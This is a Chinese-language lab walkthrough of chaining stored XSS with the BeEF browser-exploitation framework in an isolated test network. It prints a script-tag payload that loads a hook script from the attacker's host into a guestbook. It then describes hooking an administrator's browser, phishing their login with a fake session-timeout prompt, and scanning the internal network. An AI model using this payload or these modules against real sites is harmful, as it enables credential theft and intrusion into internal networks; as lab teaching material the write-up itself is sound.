BeEF结合存储型XSS的利用

XSS就不过多介绍或阐述了

实验原理

BeEF是一种专注于Web浏览器的渗透测试工具。

BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。BeEF超越了强化的网络边界和客户端系统,并在一个敞开的大门环境中检查可利用性:Web浏览器。 BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击。
 

实验场景

这里的攻击网络一般是指攻击内网。想象一下这样的场景:当一个公司内部网络的浏览器被BeEF勾住了,那么可不可以使用它来攻击这个内部网络呢?比如主机扫描,端口扫描等…答案是可以的
 

实验设备

操作机:Kali Linux主机 * 1台(192.168.20.10),BeEF
靶机:Windows 2003主机 * 1台(192.168.20.20)
 

实验步骤

一、到/usr/share/beef-xss目录下,执行命令./beef
在这里插入图片描述
在这里插入图片描述
二、打开靶机浏览器访问页面。打开留言板功能
在内容处输入恶意代码并提交<script src=\'http://192.168.20.10:3000/hook.js\'></script>
在这里插入图片描述
三、管理员登录后台点击留言管理功能
(被勾住)
在这里插入图片描述
四、攻击者进入BeEF管理界面,默认账号和密码都是beef
在这里插入图片描述
五、管理界面
查看已上钩的靶机,自动收集浏览器信息
在这里插入图片描述
六、管理界面及攻击模块介绍
HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块
在这里插入图片描述
在分类内部,BeEF可以检测出哪些命令模块可以在当前受害的浏览器工作, 并用颜色表示,如下所示:
绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转等)
红色:命令模块不适用于此目标
在这里插入图片描述
执行之前
在这里插入图片描述
七、尝试利用一
尝试社会工程学。例如,提交登录信息…
Social Engineering模块下的Pretty Theft功能:在网页弹出诱骗消息需要用户输入登录和密码,并解释该会话已超时,选择的登录框模板,这里我们选择Facebook
在这里插入图片描述
在钩子页面弹出登录框
在这里插入图片描述
获取到管理员的登录账号密码
在这里插入图片描述
八、尝试利用二
可以尝试利用浏览器扫描内网,首先是获取内网IP
Get Internal IP WebRTC模块:通过WebRTC获取未经过NAT的内网IP
在这里插入图片描述
九、尝试利用三
端口扫描
Port Scanner模块,先要配置IP,扫描默认端口
在这里插入图片描述
扫描结果
在这里插入图片描述
 
更多利用方式需读者根据自身情况去研究哦
GOT IT!

 
******************************************************
小实验小结,更多利用方式需深一步了解~

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章